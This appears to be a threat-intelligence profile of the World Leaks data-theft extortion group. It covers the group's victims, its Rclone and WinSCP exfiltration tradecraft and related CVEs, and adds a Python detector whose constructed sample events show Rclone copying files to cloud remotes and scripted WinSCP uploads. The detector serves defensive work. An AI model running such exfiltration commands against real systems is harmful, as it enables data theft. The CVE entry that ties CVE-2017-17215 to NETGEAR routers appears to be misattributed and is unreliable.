World Leaks
World Leaks is a cybercriminal extortion group that emerged in early 2025 as a rebrand of the Hunters International ransomware operation, which had been active since 2023. Reporting describes World Leaks as the successor to Hunters International and notes a strategic shift away from file encryption toward pure data theft and leak-based extortion: the group steals company data and threatens public release unless payment is made. Known aliases are World Leaks, WorldLeaks, world_leaks, and Hunters International.
The group has been linked to incidents affecting organizations in manufacturing, healthcare, technology, consumer services, and energy, with many claimed victims in the United States as well as victims in Europe, Canada, India, and China. Specific victim claims or links mentioned in reporting include Tata Electronics, Nike, Dell, Bradford Health Services/Bradford Health Partners, Fred Hutchinson Cancer Center, and other organizations listed on its leak site.
For Tata Electronics, World Leaks claimed to have stolen and published more than 200,000 files totaling over 630 GB, and reporting cited alleged exposure of emails, event logs, employee passport copies, SAP-related records, and documents tied to Apple and Tesla. Reporting also states that World Leaks made ransom demands in connection with Tata Electronics and that researchers observed the data on the group's Tor-accessible dark web site. In the Nike case, World Leaks claimed theft of 1.4 TB across 188,000 files. Some prior claims, such as Dell, involved more limited data than initially implied.
Reporting states that World Leaks focuses on data exfiltration and extortion rather than encrypting victim systems. One source says the group commonly gains initial access through phishing, compromised credentials, or exploitation of exposed services, then performs data discovery and exfiltration, prioritizing confidential corporate or personal information. Reporting also notes Hunters International's use of Rclone as a primary exfiltration tool, with WinSCP as a fallback in some intrusions.
World Leaks is described as an active extortion actor in the broader ransomware ecosystem despite its move away from encryption, and one report identifies LockBit, World Leaks, and TheGentlemen as leading groups observed targeting organizations in China.
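The following added example (not from the cited reporting or from Mallory) shows one way to flag the Rclone and scripted WinSCP activity noted above in process-creation events, including an Rclone binary that has been renamed. The event fields, sample events, rule names, and the command-line flags chosen as signals are assumptions; the page itself gives no command lines.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not from any real incident.
SAMPLE_EVENTS = [
    {"host": "FS01", "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance remote:bkp --transfers 16 --config C:\ProgramData\r.conf"},
    {"host": "FS01", "image": r"C:\Users\Public\svchost.exe",
     "cmdline": r"svchost.exe sync \\nas01\hr mega:hr --no-check-certificate"},
    {"host": "FS02", "image": r"C:\Program Files (x86)\WinSCP\WinSCP.com",
     "cmdline": r"WinSCP.com /script=C:\Temp\up.txt /ini=nul /log=C:\Temp\w.log"},
    {"host": "WS17", "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "cmdline": "WinSCP.exe"},  # interactive admin use, should not alert
    {"host": "WS22", "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy C:\src D:\backup /mir"},  # benign local copy
]

# Rclone transfer subcommand as a standalone token (so "robocopy" does not match).
SUBCMD = re.compile(r"(?<![\w\\])(copy|sync|move)(?![\w\\.])", re.I)
# Rclone "remote:path" destination; 2+ name characters excludes drive letters like D:\
REMOTE = re.compile(r"(?<![\w\\/=])[A-Za-z0-9_-]{2,}:(?![\\/])\S*")
# Flags that are specific to Rclone and common in bulk transfers.
RCLONE_FLAGS = re.compile(r"--(transfers|config|no-check-certificate|bwlimit)\b", re.I)
# WinSCP switches that indicate unattended, scripted transfers.
WINSCP_AUTOMATION = re.compile(r"(?<!\S)/(script|command)\b", re.I)

def detect(event):
    """Return the names of the rules that fire for one process-creation event."""
    name = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"]
    hits = []
    if name in ("rclone.exe", "rclone"):
        hits.append("rclone_binary")
    elif SUBCMD.search(cmd) and REMOTE.search(cmd) and RCLONE_FLAGS.search(cmd):
        # Binary name does not say rclone, but the command line has its shape.
        hits.append("rclone_renamed")
    if name in ("winscp.exe", "winscp.com") and WINSCP_AUTOMATION.search(cmd):
        hits.append("winscp_scripted")
    return hits

def triage(events):
    """Collect (host, rule) pairs so repeated hits on one host group together."""
    return {(e["host"], rule) for e in events for rule in detect(e)}

if __name__ == "__main__":
    for host, rule in sorted(triage(SAMPLE_EVENTS)):
        print(f"{host}: {rule}")
```

Both tools have legitimate administrative uses, so hits are best scoped to hosts where they are not expected, such as file servers and domain controllers.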
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Technology Hardware & Equipment
Where they target
Geographies tied to known operations.
- 🇮🇳 India
Tradecraft
42 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
1 malware family attributed to this actor across reporting.
Associated vulnerabilities
2 CVEs this actor has used in observed campaigns. 2 of them exploited in the wild.
CVE-2017-17215 9.1 NETGEAR Routers (R6400, R7000, R8000) World Leaks, TheGentlemen, Devman
Other cases include Oracle WebLogic Server CVE-2025-21535, a missing authentication vulnerability tied to initial access in activity attributed to Hunters International...
Observables
15 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware gang active since 2023 that later rebranded into WorldLeaks and shifted from file encryption to pure data theft and extortion.
Claimed responsibility for the cyberattack against Bradford Health Services and Bradford Health Partners and stated that it exfiltrated more than 760 GB of data.
Extortion group that has claimed attacks against organizations across multiple sectors including manufacturing, healthcare, technology, consumer services, and energy.
Data theft and extortion operations, threatening to publicly release stolen information unless demands are met; allegedly claimed theft and publication of data from Tata Electronics and has been linked to incidents involving Dell and Nike.